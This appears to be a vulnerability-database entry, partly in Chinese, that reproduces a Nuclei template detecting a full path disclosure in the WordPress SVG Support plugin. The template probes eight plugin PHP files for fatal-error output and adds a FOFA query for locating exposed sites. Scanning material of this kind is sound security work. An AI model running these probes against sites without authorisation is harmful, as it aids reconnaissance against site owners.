wp-svg-support-fpd: WordPress SVG Support - Full Path Disclosure

日期: 2026-01-08 | 影响软件: WordPress SVG Support | POC: 已公开

漏洞描述

The WordPress SVG Support plugin was detected to have publicly accessible PHP files without ABSPATH protection, which exposed sensitive server path information. Direct access to vendor/composer files triggered PHP fatal errors that revealed the full WordPress filesystem path.

PoC代码[已公开]

id: wp-svg-support-fpd

info:
  name: WordPress SVG Support - Full Path Disclosure
  author: pussycat0x
  severity: low
  description: |
    The WordPress SVG Support plugin was detected to have publicly accessible PHP files without ABSPATH protection, which exposed sensitive server path information. Direct access to vendor/composer files triggered PHP fatal errors that revealed the full WordPress filesystem path.
  reference:
    - https://wordpress.org/plugins/svg-support/
  metadata:
    max-request: 8
    fofa-query: body="/wp-content/plugins/svg-support/"
  tags: wordpress,fpd,disclosure,wp,wp-plugin,svg-support

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/svg-support/vendor/composer/InstalledVersions.php"
      - "{{BaseURL}}/wp-content/plugins/svg-support/vendor/autoload.php"
      - "{{BaseURL}}/wp-content/plugins/svg-support/vendor/composer/autoload_real.php"
      - "{{BaseURL}}/wp-content/plugins/svg-support/vendor/composer/ClassLoader.php"
      - "{{BaseURL}}/wp-content/plugins/svg-support/vendor/composer/autoload_static.php"
      - "{{BaseURL}}/wp-content/plugins/svg-support/svg-support.php"
      - "{{BaseURL}}/wp-content/plugins/svg-support/functions/mime-types.php"
      - "{{BaseURL}}/wp-content/plugins/svg-support/includes/svg-tags.php"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:", "failed to open stream")'
          - 'status_code == 200 || status_code == 500'
          - 'contains(body, "svg-support")'
        condition: and
# digest: 4a0a004730450220595e76f222e5c624b8013a88743fa6f39348a2ea313916d6b5e6ebbea8be8ef0022100e04522c7ed5499815ed73cc106df6fd05e74ca3efc4e8a5a90d4280fb1325faa:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/misconfiguration/wordpress/wp-svg-support-fpd.yaml

相关漏洞推荐